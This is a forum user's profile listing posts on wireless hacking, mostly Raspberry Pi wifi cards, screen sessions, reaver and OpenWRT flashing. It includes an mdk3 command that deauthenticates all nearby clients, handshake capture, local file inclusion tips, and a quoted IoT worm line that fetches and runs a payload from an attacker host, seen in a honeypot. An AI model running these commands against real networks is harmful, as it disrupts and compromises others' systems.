i8igmac
-
Posts
939 -
Joined
-
Last visited
-
Days Won
22
Posts posted by i8igmac
-
-
56 minutes ago, digip said:
I wonder if a lot of the issue with these on the Pi is proper power and connectivity for the USB cards. I see similar issues when using in a VM, even under Vmware, that when on native hardware, they tend to work fine with no issue, but same card might barf on vbox completely and work partly on VMware, even when configured with the correct USB settings on host's bios and in VM config.
Indeed this is the issue most of the time. the pi is capable of running small devices But for sure alpha cards need a separate power supply.
The alpha card may work for a short period but all it takes is a large amount of data to pass through the card to trigger a malfunction of some kind.
I have had a alpha card working with a little hack like setting the packet size to the smallest size allowed but of course this will bring your throughput to a sluggish crawl. This solution wont work in all situations or other tasks.
Iwconfig wlan1 rate 1M
This would allow the card to run longer or delay the unstable conditipn long enough to accomplish small tasks.
-
You should test the card while watching the kernel logs.
Run this.
Tail -f /var/log/kern.log
Then run your Console commands that you find to have issues...
by the way. these alpha cards Consume too much power, the raspberry pi does not supply enough voltage and you may see from the kern.log a 'over current' problem.
You need a powered usb hub.
-
correct me if im wrong, I believe Its the devices you wish to connect are no longer vulnerable to this attack.
-
10 hours ago, b0N3z said:
This setup you have is awesome. I setup followed that for my rpi3 and worked great. but still stuck on the being able to disconnect from the pi and still keep kismet running and then be able to reconnect later to check on it or stop it.
So my experience with screen is very little. I read through a couple pages about it and got the tl:dr. would this something I can do from my android phone with an app like juicessh? I installed it on my pi and use it on osx to connect to the bashbunny via serial. but thats about it.
I use it almost daily with juicessh from my android phone, after this intro I'm sure you will use it too. Just a example below.
kali@kali:~$screen (New session started with PID=4456) kali@kali:~$airodump-ng -w log-handshakes -i wlp3s0 (ctrl+a+d... disconnect from console and runs in background, We can connect back to the console later) kali@kali:~$screen (Another session with PID-4457) kali@kali:~$mdk3 -I wlp1s0 -d (ctrl+a+d... disconnect from console and background the process.) kali@kali:~$exit (Both sessions are still running)
So. There are 2console applications currently running. The first one is logging handshakes. The second session or daemon is deauthrnticating all clients in range.
I can connect back to these screen sessions at anytime.
kali@kali:~$creen -r 4456
you could do the same with kismet, I assume you are logging data just like I have done with the above example.
I think you can also start kismet with a rc.local startup script using SCREEN to allow you to connect back to the session
-
maybe another year my wish will come true. Kali android atheros...
I have installed kali on a droid incredible with vm. but its not so useful in my opinion. Metasploit is unusable because of its size. I guess you could run arpspoofing but this day is not so effective due to hsts and I already mentioned the wifi.
Pray with me to the hardware gods for autheros droid 8core.
-
I'm not so interested until a android device works out of the box and has atheros chip.
in the past, I have read about wifi attacks from android you need a usb wifi card and powered usb/hub that supports monitor mode. this would look super ugly hanging out of your back pocket.
-
16 minutes ago, Rainman_34 said:
Is anything in the US really still vulnerable to reaver? Yes but few and far between. Personally if the router appears to be anything within the last 4 years reaver becomes a last ditch effort and if it locks after just a few tries I don't even waste time trying more with reaver.
Is This null pin vulnerability working on US hardware.
I agree. There are times it just worked. most of the time the routes just lockup.
-
whata the config.log show. Pastebin
any US wifi routers effected by this null pin?
-
correct me. You want to setup a network Of vm's and prevent access to the outside world(internet)
Setup your vm. Then a few ip table rules to prevent input and output from this vm-subnet-/-to-or-from-/-your-modem.
-
Nmap -sP 10.0.0.
Simply ping.
Nmap -sS -p 80 -oX scan.xml
This will tcp syn connect scan, only a single port and save it as a xml document. With a large list of host i then import this xml document into metasploit, this will allow me to perform a scan on all host that are online. With metasploit you can do more nmap scanning and set your host list to all clients discovered in the xml or only a select group that match a filter or string of your choice.
-
digip set the facts.
Now thank i think of it. It is rare that I see this configuration
-
I guess its a matter of time before this exploit is publicly available... may take a few years. I'm excited to see it
-
13 hours ago, Dave-ee Jones said:
Actually the latest release is 2.000.052, which I had upgraded to previously but had issues with it so dropped back to 2.000.024, which allows me to use telnet and not have an overly buggy interface (both are buggy anyway..).
Here is what I would try... avoid the vm... make a kali usb or cd. Boot up and I believe kali has a tftpd service in the kali menu.
I would also do what was suggested by the previous post, if possible can you upgrade to version 040 if not then in sure the latest uptodate version should suffice.
In kali you should be prepared to monitor the traffic when you attempt the flash. Use wireshark.
when trying to diagnose a network issue you should first look at the stream.
If your in control of the traffic, your in control.
-
1st thing is to upgrade the firmware to the latest release from Ravpower which is 2.000.040.
have u done this?
-
have you looked into screen?
screen will allow you to escape from a console while leaving your current application running in the background. You can then connect back to the screen session later on.
-
7 hours ago, Dave-ee Jones said:
Yes that's where I got the TFTP stuff from. Did you read any of it? Lol.
Have you used tftp before? I can walk you threw this process, if you would like ill post the contents of the manual.
ill assume your a windows user, I can't help you here its been ten years since I ran windows.
the article I read, he specifically said he used a linux tftp server and successfully flashed 7 identical devices.
If you would like I could show you how to use a linux operating system.
-
are you a linux user?
In his instructions he says to google hootoo tm-05...
https://wiki.openwrt.org/toh/hootoo/hootoo_ht-tm05
Have you done this?
-
1 hour ago, Spoonish said:
Wireshark?
I do most of everything from a command line... since my router runs Ubuntu, there is no shortage of tools.
Tcpick is a command line tool that uses the same filtering as wire shark.
tcpick -I wlp3s0 -C
This simply shows each tcp connection made as it happens. then I ran the command below to see port 22 traffic with binary data.
Tcpick -i wlp3s0 -yP -C 'dst port 22'
I wish i had recorded the hole process.
-
Scroll down to post date of 2017. Guy says he has flashed 7 devices already and confirmed it.
https://forum.openwrt.org/viewtopic.php?id=60360
Hope it helps... don't brick it...
-
11 minutes ago, Dave-ee Jones said:
Yeah, well, you won't mind if we say "we told you so" if you're whole network gets crypto'd or all your data is deleted or sent online then will you? :P
Not worried, if you would like a shot just ask. my router is a beast custom build. Ill make this pot a permanent setup.
-
I'm not so worried, it looks like the rootkit creates a reverse proxy, the honey pot fails to execute The rootkit as per design.
-
57 minutes ago, Dave-ee Jones said:
So you used their hack to hack your own devices to gain better control of your own devices?
That's when you know you were never in control of your own devices..Sad boi.
No. That was my mistake with the iptable rules. When I attempt to log into the attackers ssh, it was my iptables rules would also forward me back to the vm... oops...
None of my devices was hacked. I setup a honeypot and gave direct acces in hopes to find some private exploits.
-
Today i noticed my network was a little sluggish, so I checked the tcp stream out of habit. I see login attempts on my home router via ssh.
So I quickly installed in virtual-box a light version of ubuntu and then I installed a honeypot. I created a user list of root:x:500-worst-passwords for ssh
With some iptable kungfu I directed the attack to the honeypot and boom I see command execution while its happening
; -)
This is exciting...
The attack was coming from hundreds of LoT devices(webcams/routers/house hold applances)
When I seen the commands executed, I see wget http:/Attack-ip-address/y808oe chmod +x y808oe ./y808oe
So I download a copy of the file for later research in hopes that it might be 0day...
One of my thoughts is the list of lot devices used, I too could could gain access to these devices.
I believe this is just a LoT device worm automated to get more devices.
Any one have experience or fun with honey pots?
-
1
-
-
You need to discover more files that you can view... ftp logs, sql logs, ssh logs, configuration files. Anything...
https://highon.coffee/blog/lfi-cheat-sheet/
Follow this tutorial and find more tutorials. There or lots of different methods you need to learn.
Here is a lfi log file list. https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI
Did you try /proc/self/environ ?
Flash OpenWRT or other onto RP-WD03 or HT-TM05?
in Everything Else
Posted
What are you doing with 7 identical wrt devices, mesh network?